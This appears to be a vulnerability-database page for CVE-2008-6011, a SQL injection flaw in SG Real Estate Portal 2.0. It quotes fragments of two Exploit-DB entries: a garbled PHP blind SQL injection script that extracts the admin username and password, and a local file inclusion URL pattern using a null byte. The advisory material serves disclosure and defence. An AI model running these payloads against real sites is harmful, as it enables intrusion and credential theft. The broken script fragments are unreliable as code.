CVE-2008-6011
published 2009-01-30CVE-2008-6011: SQL injection vulnerability in index.php in SG Real Estate Portal 2.0 allows remote attackers to execute arbitrary SQL commands via the page_id parameter.
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.6th percentile
SQL injection vulnerability in index.php in SG Real Estate Portal 2.0 allows remote attackers to execute arbitrary SQL commands via the page_id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sg_real_estate_portal | sg_real_estate_portal | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SG Real Estate Portal 2.0 - Blind SQL Injection
exploitdb·2008-09-30
CVE-2008-6011 SG Real Estate Portal 2.0 - Blind SQL Injection
SG Real Estate Portal 2.0 - Blind SQL Injection
---
1) {
$url = $argv[1];
if ($argc $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+websiteadmin_admin_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1).""));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+websiteadmin_admin_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1).""));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
} else {
echo "\nExploiting failed: By Stack\n";
}
?>
# milw0rm.com [2008-
Exploit-DB
SG Real Estate Portal 2.0 - Blind SQL Injection / Local File Inclusion
exploitdb·2008-09-30
CVE-2008-6011 SG Real Estate Portal 2.0 - Blind SQL Injection / Local File Inclusion
SG Real Estate Portal 2.0 - Blind SQL Injection / Local File Inclusion
---
#################################################################################################################
[+] SG Real Estate Portal 2.0 Blind SQL Injection/Local File Inclusion
[+] Discovered By SirGod
[+] MorTal TeaM
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
#################################################################################################################
script: http://serverfree.org/download.php?file=347076
[+] Local File Inclusion
- Note : For PoC's 4,5 you need administrative permissions.
Don't forget to put / before the local file in poc 2,3 .
Example 1 :
http://[target]/[path]/index.php?mod=[Local File]%00
PoC 1 :
http://127.0.
No writeups or analysis indexed.
http://www.securityfocus.com/bid/31489https://exchange.xforce.ibmcloud.com/vulnerabilities/45568https://www.exploit-db.com/exploits/6631https://www.exploit-db.com/exploits/6634http://www.securityfocus.com/bid/31489https://exchange.xforce.ibmcloud.com/vulnerabilities/45568https://www.exploit-db.com/exploits/6631https://www.exploit-db.com/exploits/6634
2009-01-30
Published